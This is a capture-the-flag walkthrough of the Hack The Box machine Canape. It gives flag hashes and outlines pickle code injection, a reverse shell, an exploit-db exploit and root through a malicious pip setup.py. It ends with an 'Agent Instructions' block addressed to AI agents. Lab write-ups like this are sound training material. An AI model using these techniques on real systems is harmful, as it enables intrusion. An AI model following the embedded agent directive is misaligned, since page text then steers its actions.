# Canape

## Canape - 10.10.10.70

### Target Enumeration:

OS: Linux

IP: 10.10.10.70

User: bce918696f293e62b2321703bb27288d

Root: 928c3df1a12d7f67d2e8c2937120976d

### Vulnerability Exploited:

Pickle Code Injection

### Privilege Escalation:

User allowed to run pip install as root user.

### Exploiting the host:

Nmap (used sparta as I was being lazy)

![](https://lh6.googleusercontent.com/2ez1SiQ29UBFdXQ--KyFbY7witATIIp2D-lQ0MQKwax9XJrlo4hQQbJ3XxtUmcwP8PaGqabkW6M_y3wzLiV4PuFigzAgZsatgINdYwkP06s9DQnG1v2z_re_5q5guDKZ41yv3Ybd)

There is a .git repo.

Lots of false positives with the application

.git repo gives us an address to download the source code.

<div align="left"><img src="https://lh4.googleusercontent.com/cSbVoGaglOBYbgXWDbg7OgAewZCpC57C_PJHLdGWU_uypjPYotFBYMjOKbYpZxSe8efVZo5zGSVlGHFf8IsPa8ZpZHbEY-5mLVHQ1XQjNhOiRwhHVCncmCtsmfYyVFXcPMff5zWE" alt=""></div>

Add git.canape.htb to our /etc/hosts file and clone the repo.

![](https://lh3.googleusercontent.com/MVZLve2tTC_872yIxsDO_oY00tgsaBBwKCfMr8cq8oZ8HUC-s44umShzJJF8semveTGIlIPMeETd4mqJQVWizhARaPx79N5PNq8Vp5Rqy8wtpD__eGQFpkRuHbh4hGMRNuNV3az9)

Now we have the source code we can see it is vulnerable to pickle code injection.

Researching the issue lead us to <https://lincolnloop.com/blog/playing-pickle-security/>

Although I had several issues with getting the reverse shell and had to look online for a working python exploit.

![](https://lh6.googleusercontent.com/j5Xa45qEKHt8PRM-mgV3XCIbouTPWtfVahWL7zo0vlnr67A-3d6E9GQW-vkgxGdM72cx5TgEvDgNxyF1_dKQoZJdcf_lVCzSaixlDpIffbdCoL5Od95sPo4YJNtpPu-a14TQB7ac)

<https://ironhackers.es/en/writeups/writeup-canape-hackthebox-2/>  :)

Execute the code to receive a reverse shell.

![](https://lh3.googleusercontent.com/xYhStTGqGkHUO5YPiN-8BWviC1jEPMHkpXHIj5jjff1vaSS63ZumVR-WxYG7rEROtFCToZ4x8adPvfQE91M8sy0NIrWof7xEaIVweYXif-RxpXp6TAqcu-hwEnGWMktTnocqIZyO)

Now we have a shell as www-data.

Enumerating the system and looking at the initial git code gave us a potential route

![](https://lh4.googleusercontent.com/aMwV2gt_KrTPVL6RjdQreAyDdp4GBZ_C6sTXCh5pVbBkMx7ri1maRqV26iuAwg6flPXyyKQAEJ7yJBf1nBe-RdMau51DT4m4p66OSXDwJieds1l7lbckbsZUBUdGkPFeqh9p-hx5)

We could see it was listening locally:

![](https://lh4.googleusercontent.com/-wrb7QNReZpT4BYfumSu1WVDuVmhXVYqZeMtOKctjviCxrnGdafrwN5hFPDohMaEBY3Zk76_KgK5MVOWB4t3GOVWlVPGaRup3MTnncxWA7nRPYoHpBufj9k2AgApxFR0l1q4vZm2)

Reviewing it gave us a version to check

![](https://lh5.googleusercontent.com/mUMhK57HjNe2SnU4rr_4fbGa1mPLE5g9jA5eiBzJiFNF-sA-kaLcj9OgeQnIs-CjsW4j52f5qdJPyGLaFnRDeeMl0bYs5CEHjf-f3Xyu7oAVZAcX1ir0m8LmXp8bEXCaOF5ymcqi)

And searchsploit gave us a potential exploit

![](https://lh5.googleusercontent.com/OvhFpwOb7IB3racRwX6cC62Jb6CFAt-saYesEEYWahBt1ndhyZk2YmGDNjOKVMZSRgvyO5_PHgjWzfFb_KJMuT1gKqlFJD6BLYTRNFIn5hX4PlGonyPmX_4YScw5V1i4-zFi4UA6)

This did not work so we kept looking online and found

<https://www.exploit-db.com/exploits/44498/>

Running the following creates a user for us.

![](https://lh5.googleusercontent.com/3mKJLBfWd2doDP16toF0F5EXz6C9vZWp5620aCqVaOtBc195wVf7G222dGcHw6kSWkRciD2MdfpDsqy01hoqgLNlO7MVMPjiBzSOXItyE0IOirygaU2Q-Tcp7fYzeKLHsFn7szI9)

We can now grab the passwords

![](https://lh6.googleusercontent.com/5E11_8Qg68h3yhlhdxMzAmhcm4hi3gZmFzMeie012pOu4NNcfHIzdvpmGJ6_P_Gw5CAb_yWagcZ1ByfWzBlpYL9LJoB2_1dtKKynnm_gwmN9sSCmM8dGjlZjTMY3XKg84W5EzfCF)

Upgrade to a full tty to su to the user homer (found via passwd file) or login via ssh

![](https://lh4.googleusercontent.com/RJdyHlslyauF_Ldq40y_dMZF4BzL14uARnuaeRvUFA-lZIhqhGJsPCImzQ8j7S3ZZGxPOiS6kvnrPK3p5X0CdhBYh7hDKxlfXPXu1tJ5C8T8Ql0aE2j7eLsLEiBItuzGRpVjrClk)

Upgrading current shell:

![](https://lh4.googleusercontent.com/80tPmBqeM7cZqOGFyp6Q_nZ1INXWrvkV-e6rCpdsicYoYmLS-WX3cpBA39mKMmtnpgsPzThHAn9Rj8rdPveQzWo6qrCa201FIK4X5c0W_Ngt8clN7D69-ON4iZ1tvcNMjZEx07HD)

Grab the user flag

<div align="left"><img src="https://lh3.googleusercontent.com/BDy63llTlHZ8aX6XvlVrM593pHwwQcI4BCmoqMz19Z3yCVPQPbWYcQ-C85GlFVneg2sIGYPPD_PMhJYVnKDnAmro0RdoYLvkuJry28R6q6Yvewn_CzzSAoh5GiRoi4a1tmx8fLX0" alt=""></div>

We can run pip install as root as the user homer

![](https://lh3.googleusercontent.com/2aCs9eMh1yP_AujfPYRhbQ0hyeE_5fi_AkgwSiog8cYIDHDsfwjOqbZT5993IK0BM9iNSaT4iSl4oUzYFPaSsLMYihpubFySHG9xttO0WfvyZ8R3Clu_valR8k8G5-gruPkurbdY)

Move to /dev/shm/ to stop any other files messing around with your shell.

Create the following basic python reverse shell

![](https://lh3.googleusercontent.com/1qGLTK5WBQMq1GMRkh9X9gSnDkrERjYltYrmMLcsWhKuwGshT4xirxpQy0oRQbjvGdKCUgcy7pyW17-Zb9svXv4T4ZgDVrbWf4Sve0WymnGkjIYLTaYkr9BFbLOyYlNHyEAFSIoN)

Copy to the webserver and rename setup,py to work with pip

Setup a nc listener on port 444

Install the file with sudo pip install .

![](https://lh4.googleusercontent.com/vFj_uXP5PGbs256y-YIPiwTuky4tSrKFUfOHaBfawWKkH-L5m93hw4BGRlEx0-35OumpbdSce8mVsrDdDIv16_ksVYWiMUPDAMBdlogn6g3Ha8r8rF93hURqtGKbHNCadaGdif4Y)

Now you receive a root shell.

![](https://lh3.googleusercontent.com/Y7F-BGHJMS-4klUEM6iaWDH_nFEyEZgl2_enkg5ftEXDXnzT4QgfVEDhQzlCgZN_kdoZP6e9X0gOu4UfhV25nvtWSo8Gmm_WQkZ8CwnC_6jfsfk76w6WKn4USgKKCTeRvypusknN)

Grab the root flag

<div align="left"><img src="https://lh5.googleusercontent.com/0Ed5m_arp1PcYlotjTOJd3qMwRWdOvudzIdedbOumT0uy8L1Ao4mqXnSe7wxjOrqoPPaXBzvybhXyrmGiJLDdnvFkPCPc8zL2-YO9kt8HR8PstKxf96EEMEVYY5meK8zRHYpPu6n" alt=""></div>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.jdksec.com/hack-the-box/canape.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.